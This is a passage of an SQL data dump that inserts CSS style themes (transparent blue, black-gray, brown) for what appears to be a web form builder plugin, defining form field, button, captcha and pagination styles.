!important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nmargin-left: 25px !important;\nborder-radius:0px !important;\nheight:18px !important;\n}\n.other_input:focus\n{\ncolor:#000000 !important;\nbackground-color:#FFDDC4 !important;\nfont-style:normal !important;\nborder:1px solid #000 !important;\nmargin: 0px !important;\npadding: 0px !important;\npadding-left: 5px !important;\nborder-radius:0px !important;\nheight:18px !important;\nmargin-left: 25px !important;\n}\nbutton.wdform_page_button\n{\ncursor: pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 5px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #fff !important;\nbackground-image: url([SITE_ROOT]/images/button1_3.png) !important;\nborder: 1px solid #000 !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 7px #000 !important;\n}\nspan.wdform_page_button\n{\ncolor:#fff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nmargin-bottom: 5px !important;\nbackground-color:#F06E00 !important;\nline-height: 35px !important;\n}\n.wdform_percentage_text\n{\nmargin:0px -30px 0px 0px !important;\ncolor:#fff !important;\nfont-weight:bold !important;\nfont-size: 13px !important;\n}\n.wdform_percentage_title\n{\nfont-family:"Times New Roman", Times, serif !important;\ncolor:#fff !important;\nfont-style:italic !important;\nline-height:9px !important;\nmargin: 0px 0px 0px 40px !important;\n}\n.wdform_map>div\n{\nborder:4px solid #ffffff !important;\nborder-radius:1px !important;\n}', 0),
(20, 'Style 4 Transparent Blue', 'table {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	border:none !important;\n	padding-top:inherit !important;\n	padding-bottom:inherit !important;\n	margin:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2 table, .wdform_table2 tr, .wdform_table2 th{\n	width:inherit !important;\n	vertical-align:top !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.toolbar_padding hr{\n	margin-bottom:7px !important;\n	margin-top:7px !important;\n}\n.wdform_table1 td{\n	line-height:1 !important;\n	border:none !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:middle;\n	text-align:center;\n	margin:inherit !important;\n}\n.wdform_table2 td{\n	line-height:1 !important;\n	border:inherit !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:top !important;\n	margin:inherit !important;\n	text-align:left !important;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important;\n		display:inline !important;\n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:inherit ;\n		padding-bottom:inherit;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n		font-size:inherit !important; \n		height:inherit !important;\n		display:inline !important;\n}\n.wdform_table1 button{\n	background-image:inherit !important;\n	padding:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 0px !important;\nborder: 6px solid #fff !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:transparent !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth:100% !important;\nborder:1px solid #4AB9F1 !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_td1\n{\n}\n.wdform_table2\n{\npadding-right:30px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 0px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\nbackground-color:#4AB9F1 !important;\n}\n.wdform_tr_section_break\n{\ndisplay: table !important;\nwidth: 100% !important;\n}\n.wdform_select\n{\nborder-radius:0px !important;\n}\n.wdform_input input\n{\nborder-radius:0px !important;\nborder: 1px solid #999 !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\nbackground-color: transparent !important;\ncolor:#000 !important;\n}\n.wdform_date_fields input\n{\nborder-radius:0px !important;\nborder: 1px solid #999 !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\nbackground-color: transparent !important;\ncolor:#000 !important;\n}\n.wdform_date_fields select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #999 !important;\nbackground-color: transparent !important;\ncolor:#000 !important;\nheight:20px !important;\n}\n.wdform_select select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #999 !important;\nbackground-color: transparent !important;\ncolor:#000 !important;\nheight:20px !important;\n}\n.wdform_address input\n{\nborder-radius:0px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #999 !important;\nbackground-color: transparent !important;\ncolor:#000 !important;\n}\n.wdform_date\n{\nborder-radius:0px !important;\nheight:16px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #999 !important;\nbackground-color: transparent !important;\ncolor:#000 !important;\n}\n.wdform_address select\n{\nborder-radius:0px !important;\nheight:20px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #999 !important;\nbackground-color: transparent !important;\ncolor:#000 !important;\n}\n.time_box\n{\nborder-radius:0px !important;\nheight:16px !important;\npadding:1px !important;\nmargin:1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\nborder: 1px solid #999 !important;\nbackground-color: transparent !important;\ncolor:#000 !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#000\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#000 !important;\n}\n.label\n{\nborder:none !important;\ncolor:#000 !important;\n}\n.wdform_colon\n{\ncolor:#000\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#000 !important;\n}\n.wdform_line\n{\ncolor:#000\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #999 !important;\nbackground-color: transparent !important;\ncolor:#000 !important;\nheight:20px !important;\n}\n.input_deactive\n{\ncolor:#999 !important;\nfont-style:italic !important;\nborder: 1px solid #999 !important;\npadding:1px !important;\nmargin:1px !important;\nborder-radius:0px !important;\nheight:16px;\nbackground-color: transparent !important;\n}\n.input_active\n{\ncolor:#000 !important;\nfont-style:normal !important;\nborder: 1px solid #999 !important;\npadding:1px !important;\nmargin:1px !important;\nborder-radius:0px !important;\nheight:16px;\nbackground-color: transparent !important;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_black.png) !important;\n}\n.captcha_input\n{\ncolor:#000 !important;\nborder: 1px solid #999 !important;\npadding:0px !important;\nmargin:0px !important;\nborder-radius:0px !important;\nheight:16px !important;\nbackground-color: transparent !important;\n}\n.file_upload\n{\nborder-width:1px !important;\nmargin: 1px !important;\npadding: 1px !important;\ncolor:#000 !important;\n}    \n.page_deactive\n{\ncolor:#000 !important;\nborder:1px solid #ffffff !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nborder-radius: 0px !important;\nbackground-color:transparent !important;\n}\n.page_active\n{\nfont-weight:bold !important;\ncolor:#fff !important;\nborder:1px solid #999 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#fff !important;\nbackground-color:#5EA3CC !important;\nborder-radius: 0px !important;\nbox-shadow: 0px 0px 5px 2px transparent !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin-bottom: 0px !important;\nborder-spacing: 0px !important;\nheight:25px !important;\nline-height:25px !important;\nbackground-color:#5EA3CC !important;\nborder-radius:0px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \nbox-shadow: 0px 0px 10px #ffffff !important;\n}\n.page_percentage_deactive\n{\nheight:25px !important;\nline-height:25px !important;\nbackground-color:transparent !important;\nborder-radius:0px !important;\ntext-align: left !important; \npadding:2px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#000 !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#5EA3CC !important;\nborder: 1px solid white !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #999 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#5EA3CC !important;\nborder: 1px solid white !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #999 !important;\n}\nbutton.wdform_page_button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#5EA3CC !important;\nborder: 1px solid white !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #999 !important;\n}\nspan.wdform_page_button\n{\ncolor:#5EA3CC !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.other_input\n{\nborder-radius:0px !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\nbackground-color: transparent !important;\ncolor:#fff !important;\nmargin-left: 25px !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: white !important;\nbackground-color:#5EA3CC !important;\nborder: 1px solid white !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 3px #999 !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nheight:38px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#000 !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#000 !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}\n.wdform_map>div\n{\nborder:4px solid #fff !important;\nborder-radius:1px !important;\n}', 0),
(21, 'Style 4 Black - Gray', 'table {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	border:none !important;\n	padding-top:inherit !important;\n	padding-bottom:inherit !important;\n	margin:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2 table, .wdform_table2 tr, .wdform_table2 th{\n	width:inherit !important;\n	vertical-align:top !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.toolbar_padding hr{\n	margin-bottom:7px !important;\n	margin-top:7px !important;\n}\n.wdform_table1 td{\n	line-height:1 !important;\n	border:inherit !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:middle;\n	text-align:center;\n	margin:inherit !important;\n}\n.wdform_table2 td{\n	line-height:1 !important;\n	border:inherit !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:top !important;\n	margin:inherit !important;\n	text-align:left !important;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		display:inline !important;\n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:inherit ;\n		padding-bottom:inherit;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n		font-size:inherit !important; \n		height:inherit !important;\n		display:inline !important;\n}\n.wdform_table1 button{\n	background-image:inherit !important;\n	padding:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 0px !important;\nborder: 0px solid black !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#000000 !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth:100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_td1\n{\n}\n.wdform_table2\n{\npadding-right:30px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 0px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\nbackground-color:#C2C2C2 !important;\n}\n.wdform_tr_section_break\n{\ndisplay: table !important;\nwidth: 100% !important;\n}\n.wdform_select\n{\nborder-radius:0px !important;\n}\n.wdform_input input\n{\nborder-radius:0px !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\nbackground-color: #000000 !important;\ncolor:#fff !important;\n}\n.wdform_date_fields input\n{\nborder-radius:0px !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\nbackground-color: #000000 !important;\ncolor:#fff !important;\n}\n.wdform_date_fields select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #000000 !important;\ncolor:#fff !important;\nheight:20px !important;\n}\n.wdform_select select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #000000 !important;\ncolor:#fff !important;\nheight:20px !important;\n}\n.wdform_address input\n{\nborder-radius:0px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #000000 !important;\ncolor:#fff !important;\n}\n.wdform_date\n{\nborder-radius:0px !important;\nheight:16px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #000000 !important;\ncolor:#fff !important;\n}\n.wdform_address select\n{\nborder-radius:0px !important;\nheight:20px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #000000 !important;\ncolor:#fff !important;\n}\n.time_box\n{\nborder-radius:0px !important;\nheight:16px !important;\npadding:1px !important;\nmargin:1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\nborder: 1px solid #fff !important;\nbackground-color: #000000 !important;\ncolor:#fff !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#ffffff\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#ffffff !important;\n}\n.label\n{\nborder:none !important;\ncolor:#ffffff !important;\n}\n.wdform_colon\n{\ncolor:#ffffff\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#ffffff !important;\n}\n.wdform_line\n{\ncolor:#ffffff\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #000000 !important;\ncolor:#fff !important;\nheight:20px !important;\n}\n.input_deactive\n{\ncolor:#C4CCE2 !important;\nfont-style:italic !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nborder-radius:0px !important;\nheight:16px;\nbackground-color: #000000 !important;\n}\n.input_active\n{\ncolor:#fff !important;\nfont-style:normal !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nborder-radius:0px !important;\nheight:16px;\nbackground-color: #000000 !important;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\ncolor:#fff !important;\nborder: 1px solid #fff !important;\npadding:0px !important;\nmargin:0px !important;\nborder-radius:0px !important;\nheight:16px !important;\nbackground-color: #000000 !important;\n}\n.file_upload\n{\nborder-width:1px !important;\nmargin: 1px !important;\npadding: 1px !important;\ncolor:#fff !important;\n}    \n.page_deactive\n{\ncolor:#ffffff !important;\nborder:1px solid #ffffff !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nborder-radius: 0px !important;\nbackground-color:#000000 !important;\n}\n.page_active\n{\nfont-weight:bold !important;\ncolor:#ffffff !important;\nborder:1px solid #000 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#fff !important;\nbackground-color:#C2C2C2 !important;\nborder-radius: 0px !important;\nbox-shadow: 0px 0px 5px 2px #000000 !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin-bottom: 0px !important;\nborder-spacing: 0px !important;\nheight:25px !important;\nline-height:25px !important;\nbackground-color:#C2C2C2 !important;\nborder-radius:0px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \nbox-shadow: 0px 0px 10px #ffffff !important;\n}\n.page_percentage_deactive\n{\nheight:25px !important;\nline-height:25px !important;\nbackground-color:#000000 !important;\nborder-radius:0px !important;\ntext-align: left !important; \npadding:2px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #000 !important;\nbackground-color:#C2C2C2 !important;\nborder: 1px solid #000 !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 0px #0078C9 !important;\n}\n.button_reset\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #000 !important;\nbackground-color:#C2C2C2 !important;\nborder: 1px solid #000 !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 0px #0078C9 !important;\n}\nbutton.wdform_page_button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #000 !important;\nbackground-color:#C2C2C2 !important;\nborder: 1px solid #000 !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 0px #0078C9 !important;\n}\nspan.wdform_page_button\n{\ncolor:#ffffff !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\ncolor: white !important;\nmargin: 5px !important;\ncursor:pointer !important;\n}\n.other_input\n{\nborder-radius:0px !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\nbackground-color: #000000 !important;\ncolor:#fff !important;\nmargin-left: 25px !important;\n}\n.wdform_button button\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #000 !important;\nbackground-color:#C2C2C2 !important;\nborder: 1px solid #000 !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 0px #0078C9 !important;\n}\n.wdform_page_navigation\n{\ntext-align:center !important;\nheight:38px !important;\n}\n.wdform_percentage_text\n{\nmargin:3px 7px 3px 3px !important;\ncolor:#ffffff !important;\nfont-weight:bold !important;\n}\n.wdform_percentage_title\n{\ncolor:#ffffff !important;\nfont-style:italic !important;\nmargin: 0px 0px 0px 30px !important;\n}\n.wdform_map>div\n{\nborder:4px solid #fff !important;\nborder-radius:1px !important;\n}', 0),
(22, 'Style 4 Brown', 'table {\n font-size: 12px !important;\n}\n.wdform_table1 table, .wdform_table1 tr, .wdform_table1 th{\n	border:none !important;\n	padding-top:inherit !important;\n	padding-bottom:inherit !important;\n	margin:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1 img{\n	max-width:inherit !important;\n}\n.wdform_table1 table{\n	background-color:inherit;\n}\n.wdform_table2 table, .wdform_table2 tr, .wdform_table2 th{\n	width:inherit !important;\n	vertical-align:top !important;\n}\n.wdform_page_button{\n	max-width:inherit !important;\n}\n.toolbar_padding hr{\n	margin-bottom:7px !important;\n	margin-top:7px !important;\n}\n.wdform_table1 td{\n	line-height:1 !important;\n	border:inherit !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:middle;\n	text-align:center;\n	margin:inherit !important;\n}\n.wdform_table2 td{\n	line-height:1 !important;\n	border:inherit !important;\n	padding-bottom:2px;\n	padding-top:2px;\n	padding-left:inherit !important;\n	padding-right:inherit !important;\n	vertical-align:top !important;\n	margin:inherit !important;\n	text-align:left !important;\n}\n.wdform_table1 span{\n	vertical-align:top !important;\n}\n.label{\n	font-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\n	color:#ffffff !important;\n}\n.wdform_date{\n	width:100px !important;\n}\n.wdform_table1 input, .wdform_table1 textara{\n		-webkit-transition: all 0.0s linear;\n		line-height:1 !important;\n		font-size:inherit !important; \n		display:inline !important;\n		margin-top:inherit !important;\n		margin-bottom:inherit !important;\n		padding-top:inherit ;\n		padding-bottom:inherit;\n}\n.wdform_table1 select{\n	margin-bottom:inherit !important;\n	margin-top:inherit !important;\n	line-height:1 !important;\n		font-size:inherit !important; \n		height:inherit !important;\n		display:inline !important;\n}\n.wdform_table1 button{\n	background-image:inherit !important;\n	padding:inherit !important;\n	line-height:1 !important;\n}\n.wdform_table1\n{\nfont-size:14px !important;\nfont-weight:normal !important;\ncolor:#000000 !important;\nborder-spacing: 0px !important;\nborder: 0px solid black !important;\nwidth:100% !important;\n}\n.wdform_tbody1\n{\nbackground-color:#702400 !important;\ntext-align:center !important;\nborder-radius:0px !important;\nfloat:left !important;\nwidth:100% !important;\n}\n.wdform_tr1\n{\nvertical-align:top !important;\nwidth:100% !important;\n}\n.wdform_td1\n{\n}\n.wdform_table2\n{\npadding-right:30px !important;\npadding-left:30px !important;\nfloat:left !important;\nborder-spacing: 0px !important;\nborder-collapse:separate !important;\n}\n.wdform_tr_section_break td\n{\npadding-right:20px !important;\npadding-left:20px !important;\nwidth:100% !important;\nbackground-color:#FFD79C !important;\n}\n.wdform_tr_section_break\n{\ndisplay: table !important;\nwidth: 100% !important;\n}\n.wdform_select\n{\nborder-radius:0px !important;\n}\n.wdform_input input\n{\nborder-radius:0px !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\nbackground-color: #702400 !important;\ncolor:#fff !important;\n}\n.wdform_date_fields input\n{\nborder-radius:0px !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nheight:16px !important;\nbackground-color: #702400 !important;\ncolor:#fff !important;\n}\n.wdform_date_fields select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #702400 !important;\ncolor:#fff !important;\nheight:20px !important;\n}\n.wdform_select select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #702400 !important;\ncolor:#fff !important;\nheight:20px !important;\n}\n.wdform_address input\n{\nborder-radius:0px !important;\nheight:16px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #702400 !important;\ncolor:#fff !important;\n}\n.wdform_date\n{\nborder-radius:0px !important;\nheight:16px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #702400 !important;\ncolor:#fff !important;\n}\n.wdform_address select\n{\nborder-radius:0px !important;\nheight:20px !important;\nfont-size:12px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #702400 !important;\ncolor:#fff !important;\n}\n.time_box\n{\nborder-radius:0px !important;\nheight:16px !important;\npadding:1px !important;\nmargin:1px !important;\ntext-align:right !important;\nwidth:30px !important;\nvertical-align:middle !important;\nborder: 1px solid #fff !important;\nbackground-color: #702400 !important;\ncolor:#fff !important;\n}\n.mini_label\n{\nfont-size:10px !important;\nfont-family: ''Lucida Grande'', Tahoma, Arial, Verdana, sans-serif !important;\ncolor:#ffffff\n}\n.ch_rad_label\n{\ndisplay:inline !important;\nmargin-left:5px !important;\nmargin-right:15px !important;\nfloat:none !important;\ncolor:#ffffff !important;\n}\n.label\n{\nborder:none !important;\ncolor:#ffffff !important;\n}\n.wdform_colon\n{\ncolor:#ffffff\n}\n.wdform_separator\n{\nfont-style:bold !important;\nvertical-align:middle !important;\ncolor:#ffffff !important;\n}\n.wdform_line\n{\ncolor:#ffffff\n}\n.td_am_pm_select\n{\npadding-left:5 !important;\n}\n.am_pm_select\n{\nborder-radius:0px !important;\npadding:1px !important;\nmargin:1px !important;\nborder: 1px solid #fff !important;\nbackground-color: #702400 !important;\ncolor:#fff !important;\nheight:20px !important;\n}\n.input_deactive\n{\ncolor:#C4CCE2 !important;\nfont-style:italic !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nborder-radius:0px !important;\nheight:16px;\nbackground-color: #702400 !important;\n}\n.input_active\n{\ncolor:#fff !important;\nfont-style:normal !important;\nborder: 1px solid #fff !important;\npadding:1px !important;\nmargin:1px !important;\nborder-radius:0px !important;\nheight:16px;\nbackground-color: #702400 !important;\n}\n.required\n{\nborder:none !important;\ncolor:red\n}\n.captcha_img\n{\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\ncursor:pointer !important;\n}\n.captcha_refresh\n{\nwidth:30px !important;\nheight:30px !important;\nborder-width:0px !important;\nmargin: 0px !important;\npadding: 0px !important;\nvertical-align:middle !important;\ncursor:pointer !important;\nbackground-image: url([SITE_ROOT]/images/refresh_white.png) !important;\n}\n.captcha_input\n{\ncolor:#fff !important;\nborder: 1px solid #fff !important;\npadding:0px !important;\nmargin:0px !important;\nborder-radius:0px !important;\nheight:16px !important;\nbackground-color: #702400 !important;\n}\n.file_upload\n{\nborder-width:1px !important;\nmargin: 1px !important;\npadding: 1px !important;\ncolor:#fff !important;\n}    \n.page_deactive\n{\ncolor:#ffffff !important;\nborder:1px solid #ffffff !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nborder-radius: 0px !important;\nbackground-color:#702400 !important;\n}\n.page_active\n{\nfont-weight:bold !important;\ncolor:#000 !important;\nborder:1px solid #000 !important;\npadding:4px 7px 4px 7px !important;\nmargin:4px !important;\ncursor:pointer !important;\nbackground-color:#FFD79C !important;\nborder-radius: 0px !important;\nbox-shadow: 0px 0px 5px 2px #702400 !important;\n}\n.page_percentage_active\n{\npadding:0px !important;\nmargin-bottom: 0px !important;\nborder-spacing: 0px !important;\nheight:25px !important;\nline-height:25px !important;\nbackground-color:#FFD79C !important;\nborder-radius:0px !important;\nfont-size:15px !important;\nfloat:left !important;\ntext-align: right !important; \nbox-shadow: 0px 0px 10px #ffffff !important;\n}\n.page_percentage_deactive\n{\nheight:25px !important;\nline-height:25px !important;\nbackground-color:#702400 !important;\nborder-radius:0px !important;\ntext-align: left !important; \npadding:2px !important;\n}\n.page_numbers\n{\nfont-size:11px !important;\ncolor:#ffffff !important;\n}\n.phone_area_code\n{\nwidth:50px !important;\n}\n.phone_number\n{\nwidth:100px !important;\n}\n.button_submit\n{\ncursor:pointer !important;\nfont-size: 15px !important;\nfont-weight: bold !important;\nborder-radius: 0px !important;\nmin-width: 80px !important;\nmin-height: 30px !important;\ncolor: #000 !important;\nbackground-color:#FFD79C !important;\nborder: 1px solid #000 !important;\nmargin: 5px !important;\nbox-shadow: 0px 0px 5px 